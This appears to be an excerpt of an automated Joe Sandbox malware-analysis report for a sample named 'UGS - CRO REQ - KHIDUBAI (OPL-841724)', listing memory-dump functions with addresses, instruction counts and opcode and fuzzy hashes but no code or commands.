Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d59227fca9b1392ded747cc6f3c74ccf94e552fc6c59da8dc3e80c4ef6938103
Instruction ID: d96d088aef874180f6f74405e0d10703e76ea215274c77a8a0ee04542da8c597
Opcode Fuzzy Hash: d59227fca9b1392ded747cc6f3c74ccf94e552fc6c59da8dc3e80c4ef6938103
Instruction Fuzzy Hash: BE112971B403459FDB18DF29D8809AE7FB1AF85210B05417AED55C72A5DB35C81ACB60

Uniqueness

Uniqueness Score: -1.00%

Function 046A2A84 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9262c7e531f06ee08f2fca693b185cb31f2b77b143d3ecd2c224b2b62ffbc026
Instruction ID: f5bf27fbbc53617c23b80a60ec328e49f4040aa96006e4e6322bbaa879cafda2
Opcode Fuzzy Hash: 9262c7e531f06ee08f2fca693b185cb31f2b77b143d3ecd2c224b2b62ffbc026
Instruction Fuzzy Hash: 8521F7B4E45A29CFDB34CF21CD947A9B6B1BB48305F0454E5C20DA2350EB706E99CF09

Uniqueness

Uniqueness Score: -1.00%

Function 046AA061 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 839e1a7bf97592905a8865d3460cb0340cd46b191bdfbd5902bf4882b27d376a
Instruction ID: 3a850f64a549a87b150bb2197bf48adbbd28a9c5d2da3fb9f294a4ab939101e6
Opcode Fuzzy Hash: 839e1a7bf97592905a8865d3460cb0340cd46b191bdfbd5902bf4882b27d376a
Instruction Fuzzy Hash: 4611B635B007049FCB609FA998457AE7BF2AF88711F10412AE905DB384FB75ED42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004CE528 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356255959.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62b4ca687cf1354351ea478b562af627aa202664d89c03aa59229a718a74f727
Instruction ID: a5b3d2b3a860610819bb2d007af833060882e57bf4d91755e3fee4f1daccf05f
Opcode Fuzzy Hash: 62b4ca687cf1354351ea478b562af627aa202664d89c03aa59229a718a74f727
Instruction Fuzzy Hash: 2F215E78D05218EFDB40DFAAD5487EEBBF5FB48304F1484AAD019A3345E7784A41CB05

Uniqueness

Uniqueness Score: -1.00%

Function 004CFB00 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356255959.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a27e1a83f4973e5fc95d63721a08b3c5cbb91253aa39c184de4a9bbac64c959
Instruction ID: 07426d4f1ae61513b0b1f3b868234b2ce596e1e79bc30d927d96b19fa195fda0
Opcode Fuzzy Hash: 5a27e1a83f4973e5fc95d63721a08b3c5cbb91253aa39c184de4a9bbac64c959
Instruction Fuzzy Hash: 2E110775D04219CBCB44CF99D854AEEFBB6FB88310F10803AD505B3250E738695ACBA9

Uniqueness

Uniqueness Score: -1.00%

Function 046A9D31 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2131789faac9a7ba535f0d64013cfaac1f8eecb0ef147c9362c22044d1b5188
Instruction ID: 45a751950da39097babcce870c58cba47a0e72a12ff22399b1f8fffe81eaa062
Opcode Fuzzy Hash: a2131789faac9a7ba535f0d64013cfaac1f8eecb0ef147c9362c22044d1b5188
Instruction Fuzzy Hash: 94215CB0A01608EFCB14DFA8D584ADEBBF1BF48310F20452AE411A7390E770AD45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001EFEA8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12e50e5ec2a246c2bd1a369888db91b379e91e754aad26e7ae4baefdc6f78c53
Instruction ID: 32f421c5d583b7cb065281181b399495b6be9cae274155199e7e542ec0fa2f34
Opcode Fuzzy Hash: 12e50e5ec2a246c2bd1a369888db91b379e91e754aad26e7ae4baefdc6f78c53
Instruction Fuzzy Hash: AE115E353006008BCB2A6B39E818A7E37A6EBC9765315403AF906CB761DF35DD43CB90

Uniqueness

Uniqueness Score: -1.00%

Function 046A9DE1 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d28e3691c49c554d3b9b965f6cd7d790e4319e68bf1ee37c405594f43291111
Instruction ID: eab3ef28c9ca70271afaf08f5bd03eab2ce8898595c690dc1d520c0f209df62a
Opcode Fuzzy Hash: 5d28e3691c49c554d3b9b965f6cd7d790e4319e68bf1ee37c405594f43291111
Instruction Fuzzy Hash: 74219278A02659EFDB04CF68D594EAEB7F2BF49300F204158E806AB365DB30AD45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 046AA628 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8af104d2a8b05098b164212b03fb4b3b27fbba5b48c1b7927bc0193db54ddbc9
Instruction ID: ac4f85d20aeb300bf35fbf0ca8d437a02714ef2f77d07ca10327bb160528f71c
Opcode Fuzzy Hash: 8af104d2a8b05098b164212b03fb4b3b27fbba5b48c1b7927bc0193db54ddbc9
Instruction Fuzzy Hash: 5111CE39B026049FCB25CFA9E94488DB7B6FF88310B10056AE815A7350EA32ED11CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E0CD1 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d414dd8475441d40372e87db4b83b9fb51e3cdff0fd1f1314987355b29a84bf
Instruction ID: 29ffa8c8f8d8b05e8647461d0cf49d0591df400307b20ab9eda5f93ec915d3b4
Opcode Fuzzy Hash: 2d414dd8475441d40372e87db4b83b9fb51e3cdff0fd1f1314987355b29a84bf
Instruction Fuzzy Hash: B601243630E3C01FC30787B9986095A7FB1AF9664034948EFD088CF393DA549D0ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 046A9CC0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 181a44c4e9c882b0d7e9b0dba7481ea65d794067ea72099d49cac492793765cb
Instruction ID: 191c42688765bd7fc664f8e9de6b3469f88098fadb09af8d0fe78f34be593836
Opcode Fuzzy Hash: 181a44c4e9c882b0d7e9b0dba7481ea65d794067ea72099d49cac492793765cb
Instruction Fuzzy Hash: 7D018476340718AFDB109E59EC84F9E77A9FB88720F108066FA15CB290C6B1D811CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01F12B13 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab24aab0f6dc4ec69e0793df19cc0f4e4ea51939a04d13d61c7cfb42689c1c3f
Instruction ID: ef0e27ad043c8010ff6bf0f9d10ebbdede7f2418dc45f68e224ead26a95bb452
Opcode Fuzzy Hash: ab24aab0f6dc4ec69e0793df19cc0f4e4ea51939a04d13d61c7cfb42689c1c3f
Instruction Fuzzy Hash: 9A21F674D05229CFDB20CFA5E950BAEBBF0FB09300F2044AAE419A7249E7355D859F50

Uniqueness

Uniqueness Score: -1.00%

Function 001E0DB9 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea0f0553872325b8f50cf04e9231067cc3d9170674971168c43b262ca3a52f52
Instruction ID: d6ed7ccbecc3d159dcda2bbbc59f001ba5a1f2ce09a52b098a0a5202dc9bc647
Opcode Fuzzy Hash: ea0f0553872325b8f50cf04e9231067cc3d9170674971168c43b262ca3a52f52
Instruction Fuzzy Hash: 63114C70A002598FCF46EFA8C841AADBBF1BF883047558969D449EB351EB38D9028F94

Uniqueness

Uniqueness Score: -1.00%

Function 001E0DC8 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83ae9bdec038ae82b5cab493d0e9dcff89ad1d4b86186f7dce882f40b7f2525b
Instruction ID: 00ec4b2316f038050651f962184f3363d07dc026cc7a5ebce770a9f99db5b904
Opcode Fuzzy Hash: 83ae9bdec038ae82b5cab493d0e9dcff89ad1d4b86186f7dce882f40b7f2525b
Instruction Fuzzy Hash: D5112A70A002598F8F46EFA9C441AADBBF1FF883047148969D409EB315EB35DD428FD5

Uniqueness

Uniqueness Score: -1.00%

Function 01F1734F Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a1e29a05c27b89adf4bc060770adf664afa42d40ddc2e8eb8abd95f9b606f5a
Instruction ID: 731e71067266b007ec178234036b65477e5239fbd23f21e917790dd96aebc101
Opcode Fuzzy Hash: 3a1e29a05c27b89adf4bc060770adf664afa42d40ddc2e8eb8abd95f9b606f5a
Instruction Fuzzy Hash: 79015E30C09248DFCB15EFB8D5562ACBFB4EB4A201F1082EAC848A7755E7364A55CF41

Uniqueness

Uniqueness Score: -1.00%

Function 01F1B4E1 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cce9083cf5f5874d01ada7abc43e6290de5ae6beb5a46e6d1d65afdecdbe8d8b
Instruction ID: 84116805994192f6ff3ca04339f1dca1564e51a1ad70248ad424da4f7fe4ac98
Opcode Fuzzy Hash: cce9083cf5f5874d01ada7abc43e6290de5ae6beb5a46e6d1d65afdecdbe8d8b
Instruction Fuzzy Hash: CC115B70E09349CFDB15DFB9D9812ADBFF1AB89300F1481AAC449E6259D2354581CF81

Uniqueness

Uniqueness Score: -1.00%

Function 046ACB08 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cbcbae1f9e8f40ce50e5b8e39e935c7876e90b3a7e9c60a4efcc705b4249617
Instruction ID: 68cae29a3d392e07603cce88479f8360b0dffdd3d979fdd97c46281e583abc62
Opcode Fuzzy Hash: 5cbcbae1f9e8f40ce50e5b8e39e935c7876e90b3a7e9c60a4efcc705b4249617
Instruction Fuzzy Hash: C7011A71D093998FCB42CFA588602ED7FB0AF11320F1941ABC558DB1D2E7389A59DB62

Uniqueness

Uniqueness Score: -1.00%

Function 058B664A Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d1d982cd1643caf6137d2770f1449071aef950e01908be47953ade194da8cc8
Instruction ID: fce0e69f455b06b9954ec3afa5c783e0d067f7034526bee71cf2253045d19e5c
Opcode Fuzzy Hash: 3d1d982cd1643caf6137d2770f1449071aef950e01908be47953ade194da8cc8
Instruction Fuzzy Hash: 9421E074901229CFDBA4EF64C888BEAB7B5AB48305F1080E9E41DA7344D7B45EC5CF41

Uniqueness

Uniqueness Score: -1.00%

Function 01EF1680 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9d9324d7a5cc0897f971d63994ce60a8a55c0cb57a888e7b4cb2307896687f
Instruction ID: 2845de10094ec59879d94e54b530b7f3e0823fb3cb0a1f05cb8107477870da49
Opcode Fuzzy Hash: ae9d9324d7a5cc0897f971d63994ce60a8a55c0cb57a888e7b4cb2307896687f
Instruction Fuzzy Hash: A40192317003049FD7299B38D414A7E37A2ABC5324F18866DEA164B7E0CB75DC42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01EF1688 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 996969639bd3135bb628c5b39763dfeb9865656ff4cd6d0145b3de9b0fc7d886
Instruction ID: 508218025baf448a8812f954fb69dd9a9abad55eaaf39e01fef150d1b603549e
Opcode Fuzzy Hash: 996969639bd3135bb628c5b39763dfeb9865656ff4cd6d0145b3de9b0fc7d886
Instruction Fuzzy Hash: F8015E31700704DFD7299B38D458A3A7BA3BBC5364F18966CEA564B794CB76EC42C780

Uniqueness

Uniqueness Score: -1.00%

Function 01EF46A0 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 570b3cf8493cbe2df3c6509d243442e88f96a7cae287bd751ced703217a8188b
Instruction ID: b5338de395896f1283c9bc813f0ce7e8f30fba29a75fc8d8db601ebee7bb7c6f
Opcode Fuzzy Hash: 570b3cf8493cbe2df3c6509d243442e88f96a7cae287bd751ced703217a8188b
Instruction Fuzzy Hash: 37018C36E10608DFCB10EFA9D5089DEBBF4FF89720B10826AD515A32A0EB309A05CF51

Uniqueness

Uniqueness Score: -1.00%

Function 046A90E1 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bed57ecde3b9372ac2e87db3386cf548568987caf01d1abf21c716f63aa1d436
Instruction ID: 32c9df4d5c0d3bd25b3cc7496d603580805513e4abc9914ef7f05857c461445e
Opcode Fuzzy Hash: bed57ecde3b9372ac2e87db3386cf548568987caf01d1abf21c716f63aa1d436
Instruction Fuzzy Hash: 2AF0FC72F057116FE71496196C0876EB7A5DFC5330F20456DD5059B3D0EA62AC458B90

Uniqueness

Uniqueness Score: -1.00%

Function 001E0839 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71c7f10919bf353819f03264a93ac5860410c69062fa28d953f4b5edec1adf33
Instruction ID: 892fb6ba3bb303c07aa66cfcfd0b732ca432b0e6e1e574326ece7b88e0538a70
Opcode Fuzzy Hash: 71c7f10919bf353819f03264a93ac5860410c69062fa28d953f4b5edec1adf33
Instruction Fuzzy Hash: 35017135E04349DFCF41EFB4D8585ED7BB0EF54305B5040AAD446E76A1EB740A46CB82

Uniqueness

Uniqueness Score: -1.00%

Function 046A7025 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 119d757c17a3df330242771ab9ee4edb221960b83b4c83b41f87019d1c22b039
Instruction ID: 9e8aae69b58a9ae2000855f6405e4ea87eefbea023e4ac25fe9836f1b529ed52
Opcode Fuzzy Hash: 119d757c17a3df330242771ab9ee4edb221960b83b4c83b41f87019d1c22b039
Instruction Fuzzy Hash: DB11D274A0422CCFCB15EF64D95479DB7B1EB58300F1081BA944AA7394DBB85EC5CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001E08C1 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48c123acd7c5f40708d7bfb8da1ced82395f5dc4e1e6dfac3c0834598a076001
Instruction ID: a5fca9272bedc2e2b6d26043e900e2d6e41a1c3ad8f23608a25951e80668124e
Opcode Fuzzy Hash: 48c123acd7c5f40708d7bfb8da1ced82395f5dc4e1e6dfac3c0834598a076001
Instruction Fuzzy Hash: 3EF089A17052636FE6C992E44C517BE119A8BC9F50F51406DF34DEB2C5CE196D02437B

Uniqueness

Uniqueness Score: -1.00%

Function 01EF46B0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e49055ec846998d65a7a5a349a2d6dcbcbcb01b45d418fd81075fe770a63807
Instruction ID: 44d1a81b2f82fad51b72f1632d35397a307ffeb49c8d9753170ce3de1e54a1e3
Opcode Fuzzy Hash: 3e49055ec846998d65a7a5a349a2d6dcbcbcb01b45d418fd81075fe770a63807
Instruction Fuzzy Hash: ED012835E00619DFCB00EFA9D50499EBBF5FF89711B108169E619A3350EB30AA05CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 046A90E8 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bcb8a432ca5527db2c7a6f6884b7b766c07d31bfa34c307e2f6cef1f8677032
Instruction ID: 53c88ece2e1558360d1f027ea46efc45fbf9278228f905cbf4ccd56bf3924f6e
Opcode Fuzzy Hash: 2bcb8a432ca5527db2c7a6f6884b7b766c07d31bfa34c307e2f6cef1f8677032
Instruction Fuzzy Hash: 31F02B72F047116FE7248619A80876EF7A5EBC9330F20457DE5099B3D0DB72AC418B90

Uniqueness

Uniqueness Score: -1.00%

Function 046ACAE0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8c6c6eda62899d024097703fe7e3b291605afe32d6e90389c0e0da7e7485bc4
Instruction ID: eac4606f8ba143c18b8cfc9859e69329e58934520aa2cda7af40b53a2b30abac
Opcode Fuzzy Hash: b8c6c6eda62899d024097703fe7e3b291605afe32d6e90389c0e0da7e7485bc4
Instruction Fuzzy Hash: F7F06D6284D3C84FCB539B6058600CC3FB06E2333030E42EFC9988A8E3E5280859C763

Uniqueness

Uniqueness Score: -1.00%

Function 058CF428 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 063d678b87fc43fe193d618cca7587c7e95e6a2e1c43bd14f2d224421ad5164a
Instruction ID: 560f53475c5447217b3e00a4cb11179d2b89e5e9ee6deb1750d8c4a25377450a
Opcode Fuzzy Hash: 063d678b87fc43fe193d618cca7587c7e95e6a2e1c43bd14f2d224421ad5164a
Instruction Fuzzy Hash: 980144393009119FC7199B25D514A1E77A7FFCC711B104129EA0A8B7A5CF71EC42CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 01F1AFC0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4fa97fc803bab57254e23c54871366aecc796b5d6d99216344809fbabd9b92e
Instruction ID: 4a8ab2cfc224cccdfe3cc9df229b65624ad291d41545afd129cff281e57f1575
Opcode Fuzzy Hash: d4fa97fc803bab57254e23c54871366aecc796b5d6d99216344809fbabd9b92e
Instruction Fuzzy Hash: 14012C70D09249DFCB45CFB8D9442AEBFF4EB09300F1045EAC419E32A5D7354A45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 046A9148 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 799e81c2efcea1319ace26bff6da5b2ea21cfb9b164d4a0ea55f4a950c253e54
Instruction ID: 2d925e9505898641382174d9a87f97ab07bf31c509b00fd523c1f9289c16b01f
Opcode Fuzzy Hash: 799e81c2efcea1319ace26bff6da5b2ea21cfb9b164d4a0ea55f4a950c253e54
Instruction Fuzzy Hash: 97F02BA2B0D6901FE72243296C19325ABA19B97310F2844EBD1418F3D2E956EC16C350

Uniqueness

Uniqueness Score: -1.00%

Function 001E0E10 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e426df893fef23f50f731f8e1aba3980e7af08aa5f60a76c3a7987432488ebb
Instruction ID: 0ea3e0a5022225f471c560052acecd2438bf2267bd9c9081ac2b135105561509
Opcode Fuzzy Hash: 0e426df893fef23f50f731f8e1aba3980e7af08aa5f60a76c3a7987432488ebb
Instruction Fuzzy Hash: 08014B307006498BCF06EBA8C851AADB7B2FF883043158969E409AB356DB75ED438FD1

Uniqueness

Uniqueness Score: -1.00%

Function 046A90F0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c689dab00b5bc95fbc1e5f1ecc3b7a097845d9d70bd8538c3b928572f1478490
Instruction ID: 8f1be3024c29729172c55080bb9bea6ce9c50316436758b4591d95de5e52aeac
Opcode Fuzzy Hash: c689dab00b5bc95fbc1e5f1ecc3b7a097845d9d70bd8538c3b928572f1478490
Instruction Fuzzy Hash: E7F05931B047152FE71486199C1872BF7A9EBC9720F20402DE5099B380DA72FC0187D0

Uniqueness

Uniqueness Score: -1.00%

Function 046ACAE8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5428761b2441fe6a4e6851555feee6cc350de1018ad9f29b15f57d88d62c4a74
Instruction ID: 744bdb406ddbf83be9f0b9458f689e6b30de7d84d2728547b749b978e3bb53d3
Opcode Fuzzy Hash: 5428761b2441fe6a4e6851555feee6cc350de1018ad9f29b15f57d88d62c4a74
Instruction Fuzzy Hash: 98F0346284E3C88FC7539B60586058C3FB06E2323034E47EFC9A88A4E3E5280869C733

Uniqueness

Uniqueness Score: -1.00%

Function 046A9CB0 Relevance: .0, Instructions: 36COMMON

